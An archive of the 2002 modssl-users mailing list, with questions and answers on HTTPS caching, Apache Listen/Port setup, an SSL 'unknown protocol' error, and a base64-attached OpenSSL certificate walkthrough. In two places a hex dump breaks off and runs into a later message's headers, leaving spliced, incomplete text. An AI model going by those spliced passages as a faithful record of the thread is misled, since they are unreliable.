(d08ml401.at.ibm.com [9.244.39.57]) by d12relay01.de.ibm.com (8.11.1m3/NCO v5.01) with ESMTP id g1L9Ham57586 for ; Thu, 21 Feb 2002 10:17:36 +0100 Subject: HTTPS documents caching To: modssl-users@modssl.org X-Mailer: Lotus Notes Release 5.0.8 June 18, 2001 Message-ID: From: "Tomas Hulek" Date: Thu, 21 Feb 2002 10:15:24 +0100 X-MIMETrack: Serialize by Router on D08ML401/08/M/IBM(Release 5.0.8 |June 18, 2001) at 21/02/2002 10:21:59 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Tomas Hulek" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have a question which concerning certain performance problems we are having with large HTTP/HTTPS documents. When our application (with extensive Java applet code) is run via HTTP, the browser caches all HTTP documents nicely (including HTML, CSS, GIF, JPG, JAR, CAB, XML ...). When the application is run next time, the browser indicates what documents it already has and the server just responds with the '304 Not Modified' message. However, when the application runs under HTTPS, documents of type JAR, CAB, XML (which we call from JavaScript on HTML pages) are not cached on the client at all. It it something that can be changed at the server level? Or is it purely a WWW browser issue (in that case - where to find exact description of the bahavior)? Thank you, Tomas Hulek ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 11:00:32 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA20948; Thu, 21 Feb 2002 10:59:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dns.graphimedia.it id KAA20878; Thu, 21 Feb 2002 10:59:02 +0100 (MET) Received: from alpc (nobody@localhost [127.0.0.1]) by dns.graphimedia.it (8.9.3/8.8.7) with SMTP id KAA18018 for ; Thu, 21 Feb 2002 10:58:59 +0100 From: "Alberto Guglielmo" To: Subject: R: HTTPS documents caching Date: Thu, 21 Feb 2002 10:58:57 +0100 Message-ID: <000101c1babe$61b3a400$34f75897@tcpsas.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Alberto Guglielmo" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In IE 6.0: Internet Options --> Advanced Look in the section "Security" (? I have an italian browser....) there is a checkbox about saving encrypted pages on disk. Uncheck ;) In Netscape 6.2 .... I did not find any configurable item (and I did not make any check...) Regards Alberto Guglielmo a.guglielmo@tcpsas.com Key Fingerprint:7EAF 9E34 2838 7C6B EE47 E8F0 FFC5 3CBC 90AA 5EEE PGP Keys at: http://pgpkeys.mit.edu:11371 -----Messaggio originale----- Da: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]Per conto di Tomas Hulek Inviato: giovedi 21 febbraio 2002 10.15 A: modssl-users@modssl.org Oggetto: HTTPS documents caching I have a question which concerning certain performance problems we are having with large HTTP/HTTPS documents. When our application (with extensive Java applet code) is run via HTTP, the browser caches all HTTP documents nicely (including HTML, CSS, GIF, JPG, JAR, CAB, XML ...). When the application is run next time, the browser indicates what documents it already has and the server just responds with the '304 Not Modified' message. However, when the application runs under HTTPS, documents of type JAR, CAB, XML (which we call from JavaScript on HTML pages) are not cached on the client at all. It it something that can be changed at the server level? Or is it purely a WWW browser issue (in that case - where to find exact description of the bahavior)? Thank you, Tomas Hulek ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 12:08:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA28151; Thu, 21 Feb 2002 12:03:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id MAA27920; Thu, 21 Feb 2002 12:01:03 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g1LA8Uc4918283 for modssl-users@modssl.org; Thu, 21 Feb 2002 11:08:30 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa0Ikzu; Thu Feb 21 11:08:23 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id LAA22934 for ; Thu, 21 Feb 2002 11:07:02 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id KAA39075 for modssl-users@modssl.org; Thu, 21 Feb 2002 10:58:10 +0100 (MET) Date: Thu, 21 Feb 2002 10:58:10 +0100 From: Thomas Binder To: modssl-users@modssl.org Subject: Re: How do I check to see if it works? Message-ID: <20020221105810.A4273522@ohm.arago.de> Mail-Followup-To: modssl-users@modssl.org References: <1386107842.20020218102849@e-box.dk> <20020220134409.A4000673@ohm.arago.de> <259251402.20020220214639@e-box.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <259251402.20020220214639@e-box.dk>; from neigaard@e-box.dk on Wed, Feb 20, 2002 at 09:46:39PM +0100 Organization: arago GmbH X-MIME-Autoconverted: from 8bit to quoted-printable by carat.arago.de id LAA22934 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id MAA27944 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Wed, Feb 20, 2002 at 09:46:39PM +0100, Søren Neigaard wrote: > TB> Have you also got something like > TB> Listen 443 > TB> or > TB> Listen 192.168.1.4:443 > TB> in your httpd.conf? > > I have the following: > > Port 80 > > Listen 80 > Listen 443 > > > Why do I have dublicats of port 80? See http://httpd.apache.org/docs/mod/core.html#port Thus, the Port command is effectively ignored. > Do you even think my module is installed correctly, can I check > this? How do you run Apache when you want it to support SSL, i.e. which command do you use? You have read mod_ssl's documentation, haven't you? Ciao Thomas -- Our OS who art in CPU, UNIX be thy name. Thy programs run, thy syscalls done, In kernel as it is in user! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 12:08:31 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA28247; Thu, 21 Feb 2002 12:04:01 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hambrosalle.dk id MAA27936; Thu, 21 Feb 2002 12:01:10 +0100 (MET) Received: (qmail 9842 invoked by uid 520); 21 Feb 2002 10:36:24 -0000 Received: from kim@hambrosalle.dk by antibes with qmail-scanner-1.03 (uvscan: v4.1.60/v4171. . Clean. Processed in 0.245827 secs); 21 Feb 2002 10:36:24 -0000 Message-ID: <20020221103624.9835.qmail@hambrosalle.dk> From: "Kim L. Christensen" To: "modssl-users@modssl.org" Subject: SSL Problem Date: Thu, 21 Feb 2002 11:36:24 +0100 Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kim L. Christensen" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I hope that someone can provide me with some help reg. a strange problem I have when setting up SSL with Apache. I have virtual domains installed and one IP address to the Internet - all that is working fine. I have now set up 1 virtual domain with SSL with the same virtual domain name I had already for one of the domains, and created myself a certificate following the FAQ. When I try to access https://domain_name I get a time out after a while. When I access https://internal_IP_address the server responds immediately. If I do: curl https://localhost/ the result is: curl: (35) SSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol If I do: openssl s_client -connect localhost:443 -state -debug the result is: CONNECTED(00000003) SSL_connect:before/connect initialization write to 08153F18 [08153F60] (124 bytes => 124 (0x7C)) 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00 .z....Q... ..... 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04 .........f...... 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00 ...........e..d. 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00 .c..b..a..`..... 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08 ......@......... 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 51 02 7e 73 ............Q.~s 0060 - a2 cd 80 06 26 ec 4b 78-db 58 4e 40 d5 c2 d9 a4 ....&.Kx.XN@.... 0070 - d8 81 e7 9e 30 e0 1d 60-cb 1e 18 70 ....0..`...p SSL_connect:SSLv2/v3 write client hello A read from 08153F18 [081594C0] (7 bytes => 7 (0x7)) 0000 - 3c 21 44 4f 43 54 59 from marvin-lnx.int.tele.dk id MAA00698; Thu, 21 Feb 2002 12:20:48 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 89DFABD2A; Thu, 21 Feb 2002 12:21:13 +0100 (CET) Date: Thu, 21 Feb 2002 12:21:13 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: SSL Problem Message-ID: <20020221112113.GH25883@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <20020221103624.9835.qmail@hambrosalle.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020221103624.9835.qmail@hambrosalle.dk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Feb 21, 2002 at 11:36:24AM +0100, Kim L. Christensen wrote: [SNIP] > 0070 - d8 81 e7 9e 30 e0 1d 60-cb 1e 18 70 ....0..`...p > SSL_connect:SSLv2/v3 write client hello A > read from 08153F18 [081594C0] (7 bytes => 7 (0x7)) > 0000 - 3c 21 44 4f 43 54 59 from hambrosalle.dk id NAA05836; Thu, 21 Feb 2002 13:00:19 +0100 (MET) Received: (qmail 11167 invoked by uid 520); 21 Feb 2002 12:02:17 -0000 Received: from kim@hambrosalle.dk by antibes with qmail-scanner-1.03 (uvscan: v4.1.60/v4171. . Clean. Processed in 0.253167 secs); 21 Feb 2002 12:02:17 -0000 Message-ID: <20020221120217.11160.qmail@hambrosalle.dk> References: <20020221103624.9835.qmail@hambrosalle.dk> <20020221112113.GH25883@marvin-lnx.int.tele.dk> In-Reply-To: <20020221112113.GH25883@marvin-lnx.int.tele.dk> From: "Kim L. Christensen" To: modssl-users@modssl.org Subject: Re: SSL Problem Date: Thu, 21 Feb 2002 13:02:17 +0100 Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kim L. Christensen" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks for the response, but how can I solve the problem. I am starting Apache with SSL and Apache accept my passphrase. Regards Kim Mads Toftum writes: > On Thu, Feb 21, 2002 at 11:36:24AM +0100, Kim L. Christensen wrote: > [SNIP] >> 0070 - d8 81 e7 9e 30 e0 1d 60-cb 1e 18 70 ....0..`...p >> SSL_connect:SSLv2/v3 write client hello A >> read from 08153F18 [081594C0] (7 bytes => 7 (0x7)) >> 0000 - 3c 21 44 4f 43 54 59 ^^^^^^^ > The server that you're trying to connect to is running plain HTTP - > otherwise you would not be seeing the protocol negotiation. > > vh > > Mads Toftum > -- > With a rubber duck, one's never alone. > -- "The Hitchhiker's Guide to the Galaxy" > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org Kim Christensen Hambros Alle 15 2900 Hellerup - DK (45) 2041 4156 http://www.hambrosalle.dk http://www.web-counting.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 13:31:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA09668; Thu, 21 Feb 2002 13:30:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id NAA09506; Thu, 21 Feb 2002 13:29:13 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 94D0EBD2A; Thu, 21 Feb 2002 13:29:42 +0100 (CET) Date: Thu, 21 Feb 2002 13:29:42 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: SSL Problem Message-ID: <20020221122942.GJ25883@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <20020221103624.9835.qmail@hambrosalle.dk> <20020221112113.GH25883@marvin-lnx.int.tele.dk> <20020221120217.11160.qmail@hambrosalle.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020221120217.11160.qmail@hambrosalle.dk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Feb 21, 2002 at 01:02:17PM +0100, Kim L. Christensen wrote: > Thanks for the response, but how can I solve the problem. > I am starting Apache with SSL and Apache accept my passphrase. > Check your error logs, make sure that you have SSLEngine on and increase the SSLLogLevel to debug. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 14:22:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA16014; Thu, 21 Feb 2002 14:22:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hambrosalle.dk id OAA15753; Thu, 21 Feb 2002 14:20:41 +0100 (MET) Received: (qmail 11892 invoked by uid 520); 21 Feb 2002 13:22:40 -0000 Received: from kim@hambrosalle.dk by antibes with qmail-scanner-1.03 (uvscan: v4.1.60/v4171. . Clean. Processed in 0.26845 secs); 21 Feb 2002 13:22:40 -0000 Message-ID: <20020221132239.11885.qmail@hambrosalle.dk> References: <20020221103624.9835.qmail@hambrosalle.dk> <20020221112113.GH25883@marvin-lnx.int.tele.dk> <20020221120217.11160.qmail@hambrosalle.dk> <20020221122942.GJ25883@marvin-lnx.int.tele.dk> In-Reply-To: <20020221122942.GJ25883@marvin-lnx.int.tele.dk> From: "Kim L. Christensen" To: modssl-users@modssl.org Subject: Re: SSL Problem Date: Thu, 21 Feb 2002 14:22:39 +0100 Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kim L. Christensen" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Now it's getting funny. Someone tried to log on from outside and that worked out fine. But logging on from intranet or the server itself does not work ??? Kim Mads Toftum writes: > On Thu, Feb 21, 2002 at 01:02:17PM +0100, Kim L. Christensen wrote: >> Thanks for the response, but how can I solve the problem. >> I am starting Apache with SSL and Apache accept my passphrase. >> > Check your error logs, make sure that you have SSLEngine on and increase > the SSLLogLevel to debug. > > vh > > Mads Toftum > -- > With a rubber duck, one's never alone. > -- "The Hitchhiker's Guide to the Galaxy" > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org Kim Christensen Hambros Alle 15 2900 Hellerup - DK (45) 2041 4156 http://www.hambrosalle.dk http://www.web-counting.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 15:17:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA22159; Thu, 21 Feb 2002 15:12:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from net.rongage.org id PAA21996; Thu, 21 Feb 2002 15:09:40 +0100 (MET) Received: from localhost (nobody@localhost [127.0.0.1]) by net.rongage.org (8.10.2/8.10.2) with ESMTP id g1LE9bQ07313; Thu, 21 Feb 2002 09:09:37 -0500 Received: from 64.113.37.141 ( [64.113.37.141]) as user ron@net.rongage.org by webmail.rongage.org with HTTP; Thu, 21 Feb 2002 09:09:37 -0500 Message-ID: <1014300577.3c74ffa10d4be@webmail.rongage.org> Date: Thu, 21 Feb 2002 09:09:37 -0500 From: Ron Gage To: modssl-users@modssl.org, mbslug@mbslug.org Subject: RFC: SSL-Walkthru draft MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="-MOQ10143005772fc53a6388fc04aa1e3c089f30e636f9" User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 64.113.37.141 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ron Gage X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. ---MOQ10143005772fc53a6388fc04aa1e3c089f30e636f9 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Hi Folks: I would like public commentary on the accuracy and validity of the attached document. This document purports to give a hand holding walkthru on how to implement SSL and client authentication certificates into Apache. All comments will be considers, flames will route to /dev/null Thanks! -- Ron Gage - Owner, Linux Network Services - Saginaw, Michigan - 989-274-8088 Your one-stop source for Reliable, Secure and Affordable Networking Solutions ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ ---MOQ10143005772fc53a6388fc04aa1e3c089f30e636f9 Content-Type: text/plain; name="SSL-Walkthru.txt" Content-Disposition: attachment; filename="SSL-Walkthru.txt" Content-Transfer-Encoding: base64 V2Vic2l0ZSBTU0wgTWluaS1XYWxrdGhydS4NCkNvcHlyaWdodCAyMDAyLCBSb25hbGQgUi4gR2Fn ZQ0KU2FnaW5hdywgTWljaGlnYW4gIDQ4NjAyDQoNCkludHJvZHVjdGlvbjoNCg0KVGhpcyBndWlk ZSBpcyBpbnRlbmRlZCB0byBoZWxwIHRoZSBhdmVyYWdlIHdlYnNpdGUgb3BlcmF0b3IgaW4gDQpp bXBsZW1lbnRpbmcgU1NMIHNlcnZpY2VzLiAgVGhlIGluc3RydWN0aW9ucyBoZXJlIGFyZSBwcm92 aWRlZCBhcyBpcyBhbmQgDQp3aXRoIGFic29sdXRlbHkgbm8gd2FycmFudHkuICBXaGlsZSB0aGUg aW5zdHJ1Y3Rpb25zIGJlbG93IHdvcmtlZCBmb3IgbWUsIA0KdGhleSBtYXkgZW5kIHVwIGVyYXNp bmcgeW91ciBoYXJkZHJpdmUgYW5kIGNoZXdpbmcgdXAgYWxsIG9mIHlvdXIgDQphdmFpbGFibGUg YmFuZHdpZHRoLiAgWW91IGhhdmUgYmVlbiB3YXJuZWQuDQoNClRoZXNlIGluc3RydWN0aW9ucyB3 ZXJlIGRldmVsb3BlZCB3aXRoIEFwYWNoZSAxLjMuMjAgYW5kIE1vemlsbGEgMC45LjggaW4gDQpt aW5kLiAgSSBhbHNvIHByZXN1bWUgdGhhdCB5b3UgYWxyZWFkeSBoYXZlIE9wZW5TU0wgaW5zdGFs bGVkIGZyb20gdGhlIA0KT3BlblNTTCB3ZWJzaXRlIChodHRwOi8vd3d3Lm9wZW5zc2wub3JnKS4g IEkgYWxzbyBwcmVzdW1lIHRoYXQgeW91IGtub3cgDQpob3cgdG8gZWRpdCBhIHRleHQgZmlsZSwg YW5kIHRoYXQgeW91IGhhdmUgcm9vdCBhY2Nlc3MgdG8geW91ciBtYWNoaW5lLg0KDQoxLiAgRmls ZSBQcmVwYXJhdGlvbg0KDQpZb3Ugd2lsbCBuZWVkIHRvIGNvcHkgYSBmZXcgZmlsZXMgdG8gImFj Y2Vzc2FibGUiIGxvY2F0aW9ucywgZm9yIGVhc2Ugb2YgDQp1c2Ugc2FrZS4gIFlvdSBuZWVkIHRv IGJlIHJvb3QgdG8gZG8gdGhpcy4NCg0KY3AgL29wZW5zc2wtMC45LjZiL2FwcHMvb3BlbnNzbCAv dXNyL2xvY2FsL2Jpbg0KY2htb2QgNzAwIC91c3IvbG9jYWwvYmluL29wZW5zc2wNCmNwIC9vcGVu c3NsLTAuOS42Yi9hcHBzL3NpZ24uc2ggL3Vzci9sb2NhbC9zYmluDQpjaG1vZCA3MDAgL3Vzci9s b2NhbC9zYmluL3NpZ24uc2gNCg0KTmV4dCwgZGVjaWRlIG9uIHdoYXQgZGlyZWN0b3J5IHlvdSB3 YW50IHlvdXIgY2VydGlmaWNhdGUgZGVwb3NpdG9yeSB0byBiZSANCmxvY2F0ZWQgaW4uDQoNCm1r ZGlyIC9jZXJ0cw0KDQpOZXh0LCBlZGl0IC91c3IvbG9jYWwvc2Jpbi9zaWdoLnNoIHRvIHBvaW50 IHRvIHlvdXIgY2hvaWNlIGZvciB0aGUgDQpjZXJ0aWZpY2F0ZSBkZXBvc2l0b3J5LiAgVGhlIHBs YWNlcyB0byBjaGFuZ2UgaW5jbHVkZSBhbGwgdGhlICJpZiBbIC1mIiANCnN0YXRlbWVudHMgYXQg dGhlIGJlZ2lubmluZyBvZiB0aGUgZmlsZSwgdGhlaXIgY29ycmVzcG9uZGluZyBjb21tYW5kcywg dGhlIA0KImRpciA9IiBsaW5lLCBhbmQgKGF0IHRoZSBlbmQpIHRoZSAib3BlbnNzbCB2ZXJpZnki IGxpbmUuDQoNCk1ha2UgYWJzb2x1dGVseSBjZXJ0YWluIHRoYXQgdGhlIGNlcnRpZmljYXRlIGRl cG9zaXRvcnkgaXMgb25seSBhY2Nlc3NhYmxlIA0KYnkgcm9vdC4NCg0KY2htb2QgNzAwIC9jZXJ0 cw0KDQpGaW5hbGx5LCB5b3UgbmVlZCB0byBlZGl0IHRoZSBvcGVuc3NsIGNvbmZpZ3VyYXRpb24g ZmlsZSAtIA0KL3Vzci9sb2NhbC9zc2wvb3BlbnNzbC5jbmYgLSBhbmQgdW5jb21tZW50IChyZW1v dmUgdGhlIGxlYWRpbmcgIiMiKSB0aGUgDQpsaW5lIHRoYXQgcmVhZHM6IA0KDQojIG5zQ2VydFR5 cGUgPSBjbGllbnQsIGVtYWlsLCBvYmpzaWduDQoNCg0KDQoyLiAgQ3JlYXRlIHlvdXIgb3duIENl cnRpZmljYXRlIEF1dGhvcml0eSBDZXJ0aWZpY2F0ZSAoQ0FDZXJ0KQ0KDQpZb3Ugb25seSBuZWVk IHRvIGRvIHRoaXMgc3RlcCBpZiB5b3UgaW50ZW5kIHRvIHVzZSAic2VsZi1zaWduZWQiIA0KY2Vy dGlmaWNhdGVzLiAgSWYgeW91IGFyZSB1c2luZyBjZXJ0aWZpY2F0ZWQgc2lnbmVkIGJ5IGEgcmVj b2duaXplZCANCmNlcnRpZmljYXRlIGF1dGhvcml0eSAoVGhhd3RlLCBWZXJpc2lnbiwgZXRjLi4u KSwgdGhpcyBzZWN0aW9uIG1heSBiZSANCmlnbm9yZWQuDQoNClRoZSBmb2xsb3dpbmcgY29tbWFu ZHMgd2lsbCBjcmVhdGUgeW91ciBDQUNlcnQuDQoNCmNkIC9jZXJ0cw0Kb3BlbnNzbCBnZW5yc2Eg LWRlczMgLW91dCBjYS5rZXkgMTAyNA0Kb3BlbnNzbCByZXEgLW5ldyAteDUwOSAtZGF5cyAxODI1 IC1rZXkgY2Eua2V5IC1vdXQgY2EuY3J0DQoNClRoZXJlIHdpbGwgYmUgYSBmZXcgcXVlc3Rpb25z IHRoYXQgeW91IHdpbGwgbmVlZCB0byBhbnN3ZXIgdG8gImZpbGwgb3V0IiANCnRoZSBjZXJ0aWZp Y2F0ZS4gIFRoZSBxdWVzdGlvbnMgc2hvdWxkIGJlIHNlbGYtZXhwbGFpbmF0b3J5Lg0KDQpUaGF0 J3MgaXQsIHRoZSBjYS5jcnQgaXMgeW91ciBuZXcgY2VydGlmaWNhdGUuICBUaGUgLWRheXMgMTgy NSBnaXZlcyB0aGUgDQpjZXJ0aWZpY2F0ZSBhIDUgeWVhciBsaWZlLiAgVGhpcyBjZXJ0aWZpY2F0 ZSB3aWxsIGJlIHdoYXQgeW91IHVzZSB0byBzaWduIA0KeW91ciBvdGhlciBjZXJ0aWZpY2F0ZXMg KFNTTCwgZW1haWwsIGNsaWVudCwgZXRjLi4uKQ0KDQoNCg0KDQozLiAgQ3JlYXRlIHlvdXIgb3du IFNTTCBDZXJ0aWZpY2F0ZSAoU1NMQ2VydCkNCg0KVGhpcyB3aWxsIGNyZWF0ZSBhbiBTU0wgY2Vy dGlmaWNhdGUgZm9yIHlvdXIgd2ViIHNlcnZlci4gIEl0IGFzc3VtZXMgYSANCkNBQ2VydCBoYXMg YmVlbiBjcmVhdGVkIHVzaW5nIHRoZSBhYm92ZSBtZXRob2QuICBUaGlzIG1ldGhvZCB3aWxsIGNy ZWF0ZSBhIA0Kbm9uLXBhc3N3b3JkIHByb3RlY3RlZCBzZXJ2ZXIga2V5LiAgVGhpcyBpcyBmYWly bHkgaW1wb3J0YW50IHVubGVzcyB5b3UgDQp3YW50IHRvIGVudGVyIHRoZSBzZXJ2ZXIga2V5IHBh c3N3b3JkIGV2ZXJ5IHRpbWUgeW91IHJlc3RhcnQgYXBhY2hlLiAgSWYgDQp5b3Ugd2FudCB0byBl bnRlciB0aGF0IHBhc3N3b3JkIGV2ZXJ5dGltZSB5b3Ugc3RhcnQgdXAgYXBhY2hlLCBqdXN0IGFk ZCANCnRoZSAtZGVzMyBjb21tYW5kIHRvIHRoZSBnZW5yc2EgbGluZSBiZWxvdy4NCg0KY2QgL2Nl cnRzDQpvcGVuc3NsIGdlbnJzYSAtb3V0IHNlcnZlci5rZXkgMTAyNA0Kb3BlbnNzbCByZXEgLW5l dyAta2V5IHNlcnZlci5rZXkgLW91dCBzZXJ2ZXIuY3NyDQpzaWduLnNoIHNlcnZlci5jc3INCg0K RHVyaW5nIHRoZSBxdWVzdGlvbnMgZm9yIHRoZSByZXEgc2VjdGlvbiwgdGhlIGltcG9ydGFudCBv bmUgdG8gZ2V0IHJpZ2h0IA0KaXMgdGhlICJDb21tb24gTmFtZSIuICBUaGlzIG5lZWRzIHRvIGJl IHRoZSB3ZWJzaXRlIGFkZHJlc3MgKGUuZy4gDQp3d3cucm9uZ2FnZS5vcmcpLiAgSWYgdGhpcyBp cyBub3Qgc2V0IGNvcnJlY3RseSwgdGhlbiB3ZWIgYnJvd3NlcnMgd2lsbCANCmNvbXBsYWluIGFi b3V0IHRoZSBjZXJ0aWZpY2F0ZSBiZWluZyBvd25lZCBieSBvbmUgbmFtZSwgYnV0IGJlaW5nIHNl cnZlZCANCmJ5IGFub3RoZXIuDQoNClRoaXMgc2hvdWxkIHByb2R1Y2UgYSBmaW5hbCBzZXJ2ZXIu Y3J0IGZpbGUgLSB5b3VyIFNTTCBjZXJ0aWZpY2F0ZSBmb3IgDQp5b3VyIHdlYiBzZXJ2ZXIuICAN Cg0KQW4gaW1wb3J0YW50IG5vdGUgZm9yIHRob3NlIG9mIHlvdSBydW5uaW5nIHZpcnR1YWwgbmFt ZSBiYXNlZCBzZXJ2ZXJzIA0KKHNldmVyYWwgd2Vic2l0ZXMsIG9uZSBJUCBhZGRyZXNzKTogIER1 ZSB0byB0aGUgd2F5IHRoYXQgU1NMIGhhbmRsZXMgdGhlIA0KbmVnb3RpYXRpb24gcHJvY2Vzcywg bmFtZS1iYXNlZCB2aXJ0dWFsIHNlcnZpbmcgd2lsbCBOT1Qgd29yayBmb3IgeW91ciANClNTTCBz aXRlcy4gIFlvdSB3aWxsIG5lZWQgdG8gdXNlIGEgc2VwZXJhdGUgSVAgYWRkcmVzcyBmb3IgZWFj aCBTU0wgc2VydmVyIA0KeW91IGhvc3QuICBZb3VyIGZpcnN0IFNTTCBzZXJ2ZXIgY2FuIHVzZSB0 aGUgc2FtZSBJUCB5b3UgdXNlIGZvciB5b3VyIA0Kb3RoZXIgdmlydHVhbCBob3N0cywgYnV0IGFu eSBzdWJzZXF1ZW50IFNTTCBzZXJ2ZXIgbXVzdCBoYXZlIGEgZGlmZmVyZW50IA0KSVAgYWRkcmVz cy4gIFRoZSBzeW1wdG9tIG9mIHRoaXMgcHJvYmxlbSBoaXR0aW5nIHlvdSBpcyB0aGF0IHJlZ2Fy ZGxlc3Mgb2YgDQp3aGF0IFNTTCBzZXJ2ZXIgeW91IHRyeSB0byBhY2Nlc3MsIG9ubHkgdGhlIGZp cnN0IHNlcnZlciBsaXN0ZWQgaW4geW91ciANCmh0dHBkLmNvbmYgZmlsZSBjb21lcyB1cC4NCg0K 